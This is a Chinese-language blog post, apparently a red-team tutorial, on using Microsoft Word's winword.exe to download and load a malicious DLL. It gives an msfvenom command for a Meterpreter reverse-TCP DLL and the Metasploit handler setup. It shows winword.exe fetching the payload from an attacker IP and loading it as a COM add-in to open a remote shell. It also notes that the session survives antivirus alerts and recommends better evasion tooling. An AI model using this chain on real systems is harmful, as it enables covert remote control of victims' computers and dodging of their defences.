当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
0x01 winword简介
winword.exe是微软Microsoft Word的主程序。该字处理程序是微软Microsoft Office组件的一部分。
0x02 通过winword.exe执行payload
msfvenom生成木马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 -f dll > /var/www/html/shell.dll
设置监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.19.146
set lport 23333
exploit
winword.exe下载payload:
winword.exe "http://192.168.19.146/shell.dll"
在未开启杀毒软件的情况下,winword.exe未对远程文件做校验直接下载到本地,下载的文件位置:
C:\Users\username\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
在开启杀毒软件的情况下执行该下载命令时会被拦截,下载的dll文件也会被删除:
winword.exe客户端会以只读的形式乱码显示文件内容:
通过winword.exe加载dll文件,步骤如下:
文件-->选项-->添加com加载项-->到下载的dll文件位置添加dll文件
添加成功后顺利建立会话:
当火绒和360处于开启的情况下,添加木马dll会报警,但会话依旧会建立:
0x03 总结
-
使用msfvenom生成的木马在下载时就会被查杀,建议使用免杀效果更好的工具生成木马。
-
winword.exe在加载木马时调用rundll32.exe程序,所以只能使用32位dll。
-
下载的木马文件即使关闭office程序后也不会被删除。
-
vt免杀结果感人:
参考资料:
lolbas-winword:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/
通过微软office下载和执行payload:https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
虽然我们生活在阴沟里,但依然有人仰望星空!